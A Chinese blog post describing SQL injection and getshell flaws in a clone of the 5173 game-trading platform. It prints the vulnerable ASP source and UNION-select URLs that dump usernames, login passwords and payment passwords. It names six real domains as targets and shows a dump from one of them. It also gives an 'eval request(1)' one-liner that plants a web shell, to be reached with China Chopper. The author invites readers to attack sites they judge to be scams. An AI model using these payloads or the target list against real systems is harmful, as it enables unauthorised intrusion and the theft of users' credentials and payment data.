zoukankan      html  css  js  c++  java
  • 仿5173游戏交易平台系统SQL注入(可直接*)+Getshell

    最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是 5173平台交易的网站,叫我直接把号的信息填上去然后填好了之后就去他就会去购买,然后仔细看了一下平台,获取了源代码后看了一下~呵呵,漏洞还是有不 少的~ 仿5173网游交易平台游戏交易平台存在注入与getshell漏洞,可直接拖掉玩家数据~
        发乌云上乌云不收,所以没事就发zone里给大家玩玩。其实这系统还是蛮多漏洞的,我最痛恨骗子了,大家能搞几个骗子平台就搞几个去吧~案例上大多都是一些骗子搭建来钓鱼的。

    0.jpg

    A:SQL注入一:
    漏洞文件:/help.asp

    <!--#include file="conn.asp"-->
    <!--#include file="inc/config.asp"-->

        <%
      if trim(request("id")) <> "" then
      set rs=conn.execute("select * from help where id ="&trim(request("id"))&" order by paixu asc")
      if not rs.eof then
      title=rs("help_title")
      content=rs("help_content")
      end if
      else
      set rs=conn.execute("select top 1 * from help order by paixu asc")
        if not rs.eof then
      title=rs("help_title")
      content=rs("help_content")
      end if
      end if%>


         这里id参数过滤不严存在sql注入的,但是conn.asp中包含了:
    <!--#include file="sqlin.asp"-->都知道这个防注入文件很垃圾吧,只做了GET和POST的防注入,可直接转为cookie注入绕过

    05.jpg

    这个注入我就不多研究了,看下一个支持UNION query的注入点。


    B:SQL注入二
    漏洞文件:/card_server.asp

    <%
    function OpenDB(sdbname)
    {
    /*
    *--------------- OpenDB(sdbname) -----------------
    * OpenDB(sdbname)
    * 功能:打开数据库sdbname,返回conn对象.
    * 参数:sdbname,字符串,数据库名称.
    * 实例:var conn = OpenDB("database.mdb");
    *--------------- OpenDB(sdbname) -----------------
    */
    /*var connstr = "driver={SQL Server};server=.;uid=sa;pwd=7881541;database=wangyou";*/
    var connstr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source="+Server.MapPath(sdbname);
    var conn = Server.CreateObject("ADODB.Connection");
    conn.Open(connstr);
    return conn;
    }
    var oConn = OpenDB("HSGAMEDB/#HSgame201008041121.asp");
    var sel = Request("sel");
    var classid = Request("classid")
    var fieldname = Request("fieldname")
    var arrResult = new Array();
    //var sql = "select "+fieldname+" from game_class where parentid='"+sel+"' and classid="+classid;
    var sql = "select * from card_class where parentid="+sel+"";
    //Response.Write("alert("+sql+")")
    var rs0 = Server.CreateObject("ADODB.Recordset");
    rs0.Open(sql,oConn,1,1);
    while(!rs0.EOF)
    {
    //遍历所有适合的数据放入arrResult数组中.
    arrResult[arrResult.length] = rs0(0).Value+"|"+rs0(1).Value;
    rs0.MoveNext();
    }
    //escape解决了XMLHTTP。中文处理的问题.
    //数组组合成字符串.由","字符串连接.
    Response.Write(escape(arrResult.join(",")));
    %>


      这里没有直接包含数据库连接文件,直接创建了连接对象,导致这一个注入是无法被sqlin.asp防御,注意,Request的sel参数没有过滤直接带入查询导致了SQL注入。简单构造一下注入点:


    http://127.0.0.1/card_server.asp?sel=1'

    Microsoft JET Database Engine 错误 '80040e14'
    字符串的语法错误 在查询表达式 'parentid=1'' 中。
    /card_server.asp,行 28



    01.jpg
    02.jpg


    支持联合查询,可直脱掉ganme_user的玩家数据,好像sqlmap没有game_user的字典吧?。还有一个字段"alipay_pwd"是用户的支付密码~


    http://127.0.0.1/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user

    03.jpg
    04.jpg

    由于通用型的要5个案例,那我就来五个~


    http://hhgg88.com/card_server.asp?sel=1
    http://www.loft98.com.cn/card_server.asp?sel=1
    http://mosouu.com/card_server.asp?sel=1
    http://gaoyi.cc/card_server.asp?sel=1
    http://www.631hk.com/card_server.asp?sel=1



    我来脱个裤子给大家看看:

    http://www.tylsf.com.cn/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user

    06.jpg


    C:GETSHELL:
    漏洞文件:/SqlIn.Asp


    <%
    '--------数据库连接部分--------------
    'dim dbkillSql,killSqlconn,connkillSql
    dbkillSql="sql_whelpu.asp"
    'On Error Resume Next
    Set killSqlconn = Server.CreateObject("ADODB.Connection")
    connkillSql="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql)
    killSqlconn.Open connkillSql
    If Err Then
      err.Clear
      Set killSqlconn = Nothing
      Response.Write "数据库连接出错,请检查连接字串。"
      Response.End
    End If


    '--------定义部份------------------
    'Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr,Kill_IP,WriteSql
    '自定义需要过滤的字串,用 "|" 分隔
    Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
    Kill_IP=True
    WriteSql=True      
    '----------------------------------


    Fy_Inf = split(Fy_In,"|")
    '--------POST部份------------------
    If Request.Form<>"" Then
      For Each Fy_Post In Request.Form
        For Fy_Xh=0 To Ubound(Fy_Inf)
          If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
            If WriteSql=True Then
              killSqlconn.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Fy_Post&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")
              killSqlconn.close
              Set killSqlconn = Nothing
            End If
            Response.Write "<Script Language=JavaScript>alert('系统提示:108非法操作!');</Script>"
            Response.Write "非法操作!系统做了如下记录↓<br>"
            Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
            Response.Write "操作时间:"&Now&"<br>"
            Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
            Response.Write "提交方式:POST<br>"
            Response.Write "提交参数:"&Fy_Post&"<br>"
            Response.Write "提交数据:"&Request.Form(Fy_Post)
            Response.Redirect("default.asp")
            Response.End
          End If
        Next
      Next
    End If
    '----------------------------------

    '--------GET部份-------------------
    If Request.QueryString<>"" Then
      For Each Fy_Get In Request.QueryString
        For Fy_Xh=0 To Ubound(Fy_Inf)
          If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
            If WriteSql=True Then
              killSqlconn.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','GET','"&Fy_Get&"','"&replace(Request.QueryString(Fy_Get),"'","''")&"')")
            killSqlconn.close
            Set killSqlconn = Nothing
            End If
            Response.Write "<Script Language=JavaScript>alert('系统提示:108非法操作!');</Script>"
            Response.Write "非法操作!系统做了如下记录↓<br>"
            Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
            Response.Write "操作时间:"&Now&"<br>"
            Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
            Response.Write "提交方式:GET<br>"
            Response.Write "提交参数:"&Fy_Get&"<br>"
            Response.Write "提交数据:"&Request.QueryString(Fy_Get)
            Response.Redirect("default.asp")
            Response.End
          End If
        Next
      Next
    End If


    %>



    这里直接将用户非法提交的字符串写入了sql_whelpu.asp的数据库里面了,试想一下,如果故意加入一句话不就可以GETSHELL了吗? 在没有被人插入过asp的<%%>符号则可直接访问:

    http://127.0.0.1/list_buy.asp?class_1=35536%20%3C%eval%20request(1)%%3E

    当然如果有被人提交过的需要注意闭合就可以获取webshell了~ 这里成功将一句话写入数据库:sql_whelpu.asp,我们打开看看是不是呢?

    08.jpg

    菜刀连接:
    http://127.0.0.1/sql_whelpu.asp

  • 相关阅读:
    Python中所有的关键字
    关于selenium的8种元素定位
    对提示框的操作
    selenium+webservice进行百度登录
    MISCONF Redis is configured to save RDB snapshots, but is currently not able to persist on disk. Commands that may modify the data set are disabled...报错解决
    Vue中使用echarts
    npm WARN deprecated request@2.88.2: request has been deprecated, see https://github.com/request/request/issues/3142解决方法
    插入排序
    冒泡排序优化
    roject 'org.springframework.boot:spring-boot-starter-parent:XXX' not found 解决
  • 原文地址:https://www.cnblogs.com/hookjoy/p/4104618.html
Copyright © 2011-2022 走看看